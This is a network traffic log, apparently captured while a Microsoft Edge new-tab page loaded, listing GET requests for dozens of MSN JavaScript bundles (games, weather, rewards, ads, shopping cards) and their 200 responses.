200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/casual-games-card.a167d09a6132afb2c9e7.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/notification-bell-wc.b8b89b3e585f18ba3d74.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback.718b143d7dd195e0e78c.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-control-wc.5d6a24cfa3a5d942c0a3.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/casual-games-carousel-card.d02d6e511790507db70d.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/casual-games-experience.f0d4a1bd27572eb91b72.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/category-data-connector.ddf00078a42ad97c25f0.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/channel-list.8cf9f0cff63d0086eec9.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/office-leftrail.8c9f014b26d925786fd8.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/clarity.c56c7cc06684c600b04b.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/ms-rewards-wc.e3c2ca149f1a9e509b34.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/outlook-email-preview-wc.8c0031a31a14c719ff51.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-app-upsell.e972e8da27c983f445e1.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/feed-toggle-wc.9e09a65888cbbf646c3b.jsHTTP Request
GET https://assets.msn.com/breakingnews/v1/cms/api/amp/article/AA430z6HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/CoachmarkData.4b820d591661c69411df.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/layout-toggle.521098bde0a4006e7f9d.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/pill-wc.773c446bd0bf78402bfd.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/RewardsData.7fe3143f20fa27579f6c.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/RewardsCoachmarkData.33cccbe27d4bdbd24132.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/ocvFeedback.1a51892213fa4b659115.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/cold-start-gif.05ea6cc30c2f0977775a.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_esports_dist_index_js.33af26803714838c83b1.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/toast-wc.712ac4c4657e9e316587.jsHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/weather-data-lazy-services.eb2ed0225efab053ef95.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/cold-start-wc.bb5af50faf8792f370ad.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-hide-remind_index_js.88b7d28d697039071577.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_welcome-greeting-wc_dist_components_finance-greeting_index_js.d0193a33a56cae62b9b7.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sticky-peek.c9cf795ac2b6fbe646cd.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_weather-card-wc_dist_components_weather-report-issue_index_js.b7dc292fe6ab9ad01e05.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_weather-shared-wc_dist_index_js.14c631405f471e01d5ab.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/company-news-card.f07d7f0f5007f0ac8ffc.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/content-group-card.33b3e6a94fad66e0d0d2.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/daily-discovery.ae9ec9af044c04c26717.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/default-browser-reclaim-banner.ab76bc3eca2337852256.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/DefaultBrowserReclaimData.8abfe95ed5d89b77eb4c.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_finance-service-library_dist_index_js.8409bd17de173fd1a321.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/dev-tools.f74ce40844294f403d22.jsHTTP Request
GET https://assets.msn.com/service/Finance/Exchanges?apikey=1hYoJsIRvPEnSkk0hlnJF2092mHqiz7xFenIFKa9uc&activityId=BBDF58A6-1710-44BE-A527-DB44C4CAFD8D&ocid=anaheim-ntp-Peregrine&cm=nl-nl&ids=r6dwnt&wrapodata=falseHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/money-info-card-wc.4de7fd7c76c8c155065d.jsHTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/money-info-shared-state.7b1eab02b83490d587c9.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/diagnostic-web-vitals.4413feeef57b90b9f7b4.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/digest-card.9433690b76803ea3f447.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/edge-shopping.b3320f6f6901d2d614c9.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/EdgeNextPage.constants.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/EdgeNextSSRInteropContract.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/EdgeNextTelemetry.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/esports-card.3f958efc90cd39f2bea1.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/esports-streams-card.c78faed25a679855e974.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/ExperienceLoadedData.503d466bcf252ff0962b.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_shopping-page-base_dist_ShoppingBaseExperience_js-experiences_shopping-page-base_-616b96.0f1e1b7c26f4196e5078.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-coldstart_index_js.e9c7427677f899fd847a.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-feedback_index_js.385f3a79ac2984385764.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-hidepopup_index_js.6d4201d917bde3412a35.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_components_sports-hidereminder_index_js.0e7d87527d8dba739255.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/experiences_sports-card-wc_dist_SportsCardWCNavigationList_template_js.808253cefe995531ddee.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/feedback-dialog.587b66732fd5b0175502.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/FeedNavHeaderData.599a3827c3bf66e36e86.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/game-card.9e09d6dab71642fd4787.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-compete-card.ba57c1a3f940ac801bbf.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-discover-strip.7d54bea3737a98214ac3.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-match-card.26c9ae01280ca90596e9.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-media-carousel.cf0f03c5a0eed2c589dd.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-personalization-card.62461b12b3b48fe42757.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-recentlyplayed-card.0bdcd24857ce351c11a0.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-recommended-card.be8347ed243d9990b200.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-reddit-card.d515b4fb2915747a57f6.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-rewards-card.68ea4bca9b738a5c05bd.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-stream-card.cc7ed914266b41c952eb.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-tournament-card.1725b6e7e6b2cb2f3e0d.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-upcoming-card.23698fb9c3e093825cfc.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/gaming-video-card.74134d2e65813cf2f018.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/general-elections.6c85b4ca4c30f23f462e.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/grocery-coupon-sd-card.fbaab90b6d413d517d48.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/health-tip-wc.d88bdbe8e413481770e0.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/healthFitnessCarousel.ff57e0a030983b51f924.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/holiday-effects.8b7b612e83fe57604987.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/horizontal-nav.eb7da7ce198b6ea7198e.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/horoscope-answer-card-wc.b45461686e284b90d482.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/image-search-wc.37ae1445ec931d23d653.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/inline-head.3bf3117a7af2b27ce0a9.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/inline-head.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/inline-tuning-upsell.09b4a84cb8dc8b04f466.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/interest-management-card.cb9d3fcd355e3b7b779a.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/interests-wc.f8e42bfc06c988caaa25.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/language-mismatch-banner.19818d06fb645ffc2a04.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/LanguageMismatchData.1deacf2a60938e450289.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/layoutPreferenceData.0fe44e79c268544b5336.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_sports-data-service_dist_index_js-_75510.018c44447b9aa421f209.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_sports-data-service_dist_index_js-_75511.2667a3eb01b6cff31239.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_sports-shared-wc_src_sports-card-followicon_index_ts.0170a0bf068874e973f8.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_video-card-plugin-factory_dist_virtualadsplayer_plugin_js.7357acb432e650b6b96c.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/libs_video-card-plugin-factory_dist_xandr_XandrAdManager_js.fdec53460ab84a52c542.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/linear-view-feed.39a81a2afd7ac24e678d.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/linked-in-card.c6a5b477a67361873a96.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/locationMarker.c83ae9fa8639d5085677.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/lottery-card.e3b874a0946e7769ad2e.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/marketplace-card-wc.2966ee1ee60fcbf21ee8.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-app-upsell-floating-btn.5d651bc53a8dbba52f47.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-channel-slider.e60642fb977d3dd99f68.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/mobile-story-viewer.9435df4775d653b44785.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/mockConfigs.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/mockHeader.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/msccCookieBanner.62970e876c3e19cf4ba1.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-call-to-action.2a74d2bf16e40627a28a.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-decoration-combo.dde4b1c2e91d0ae13ee5.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-like-button.68a5d03024e2d997e0d8.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-sales-highlight-v1.fc83432c05225bef9020.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-sales-highlight-v3v4.f899fae2a4c0ee0a240e.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/native-ad-trending.0170e00a2d7de64c7c7e.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/nativeadsdecorations.a97b85a690ead9e855a6.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/nativeadstemplates.75bac078588f2efa0475.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/navigation-page-experience.c48d83f131479394abde.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/news-headline-below-searchbox.c657f4383d8be5190212.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/news-segment-carousel.798e95801ce23f261ce9.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/newsbar-toggle.b3d4d234765acfcd1354.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_intersection-observer_intersection-observer_js.7ed8a4e215d160c64db4.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/node_modules_microsoft_teams-js_dist_MicrosoftTeams_min_js.814c5857b6e2e0ee1e32.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/node.index.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/ocv-feedback-data/index.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/ocv-feedback-data/OcvFeedbackData.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/office-coachmark.7bcca8947168ab4a4369.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/office-feed.d68a99b40ee038752a3a.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/on-this-day-card-small.5b52f49b4016d391b40d.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/on-this-day-card-wc.7ea4a6a1d547b30a4c75.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/oneTrustCookieConsentData.d8f0da7ae9be65bc00d8.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/overlay-wc.621c3dc21025ba29d49b.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/page-error-handling.a13f9c27d3e8a06981e5.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/page-error-handling.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/page.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/personalize-nav-button.89ca031a383b5fa6f5a8.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/pivots-nav-edgenext.5d64d9feb95449f80d88.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/polls-card-wc.b80021107ab8b2e0abf4.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/poweredby-legend-wc.574aab6c8b55c86b3a97.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/poweredByData.8d934c50f38e418267ab.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/premium-profile-promo-card.022e4d920b178401e531.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/prism-carousel-card.bba6c3a7f2a5a718ccb2.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/prism-sd-card.3a9e567c3234fbb13ff6.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/profile-promo-card.1f073e45985a917c3289.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/promoBannerWC.ebb1901dc6fb5f35d1d3.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/publisher-carousel.b8332e3891c891eaceb5.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/publisher-subscribe-follow-button.c6313c738db2d45998a0.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/qna-card.ec744bc4c978026b4055.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/quiz-card.155dba45d34d64065dda.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/reaction-breakdown-dialog.9508ba4851df55af4e47.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/real-estate-card.06e01fe7aa21c776a190.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/recipes-sd-card.2473a0f04be920d6a895.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/recommended-interests.8336a25fc2f55ad6f94b.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/recommended-search-carousel-wc.3098cafab71ed7994845.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/recommended-searches-card.4a8a81a2eb5af9c5e93f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/recommendedSites-wc.f505824e537fe2c30da3.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/rewards-card-wc.0be4be65d6dbcc2b4646.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/rewards-daily-set-card.f357b64200b27dc1722c.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sd-card-mask-wc.a349a0a797d81f5c893f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/search-history-edgenext-wc.34b252b6ab510f09f873.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/SearchHistoryEdgenextData.374a311a416d7d948536.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/select-carousel.cc4acbefe2094d2b0364.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/shared-links.5286b1ffbfe696aff00a.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sharepoint-news-card.ef8314453be9925f488f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/shopping-edge-insights-card.3ea19097c2ff9950a667.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/shopping-events-deal-card.d7566fbb2ed60ccf2313.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/shopping-page-base.369d8079097e5d783a69.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/shoppingHomepage.830f74fba820d5a69faa.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/shuffle-fre.0e7ad97032438fa4338a.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/side-bar.600ee59098c5370348c6.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-banner-wc.af11dd8d99c1e5a0d395.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sign-in-flyout-wc.aa02e471970af1ba1a46.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/SignInData.81c3c0c99a253c9ea77a.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/social-avatar.5d2cace8d1dbfd2bd7ce.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/social-bar-wc.8353b849362f9ea37eab.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/social-data-connector.13c70cc7d739a7a3ca55.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/social-report-menu.eb3f75adfdccd43b5b0b.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sports-card-wc.3d5af06df7fef5da78b3.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sports-olympic-card-wc.98ce3fcd67b38099763f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/sports-worldcup-card-wc.0b7341fe552fd4e31e77.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/spotlight-card-wc.584b25be3917b7234344.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.9b9032f35dbb82e24944.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/story-carousel.047d14adc88c3d781627.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.bdb4d4cd3be840de4bb0.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/superBreakingNews.1386cfe9a5c4cf5d87d9.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/tabbed-feed-wc.f3a6edc89edd4617494e.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/theme-picker-wc.8b7567876460f006feb3.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/traffic-card-wc.e922db87c4071766aee4.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/travel-carousel.5ef3f88f8cf08cbd4645.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/travel-destination.4c3824c77bdb27430d27.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/trending-search-card.32e3ea83d79351d088ee.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/trendingTopics.0cf9d40ec096d7d8f45d.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/vertical-left-nav.8b69a442fc82d0d00a34.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/video-shopping-card.79789aa8d7167d23cc9c.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/videoCard.b014118035121ed131a0.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/voice-search-wc.0da68c02655517a26ec3.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/VpReadyHelper.a75547cb104126095d6f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_content-video-player_dist_index_js.1cf6dc1d550b48556b34.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_inline-location-settings_dist_index_js.86f368ebdf16981812d3.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_native-ad-video_dist_index_js.ae9e740a9c7a71fd27cd.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_stock-chart_dist_index_js.dd9b8aeb8fe0a92c79a2.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-cards_dist_cards_sub-components_card-action-tray_OptedOutReactionTemplate_js.985cdbd0b726e7133ac5.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedAdsCTAModule_js.037b97026b9a66132027.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedAdsLoggingModule_js.a8d252d6e629326178be.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedDescriptionModule_js.e81bb4ffa3fc37eba8de.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedEntNewsModule_js.f1a06ef0cca19a5aba46.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedHoverScaleImageModule_js.ccdaa049c75d4b4d6829.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedHoverShowAbstractModule_js.ce640e09510b3762bde6.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedInfopane24Module_js.0506598e167dfc898a5e.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedInfopaneModule_js.5ca0e6c591f4d1983642.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedNoHoverModule_js.b0a99cc387da61b83d43.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedRIS1Module_js.5ec8bb1b06a9d71ae17f.jsHTTP Response
200HTTP Request
GET https://assets.msn.com/bundles/v1/edgeChromium/latest/web-components_super-container_dist_register_CsFeedSafeAdsModule_js.1b05164a35de83093b95.jsHTTP Response
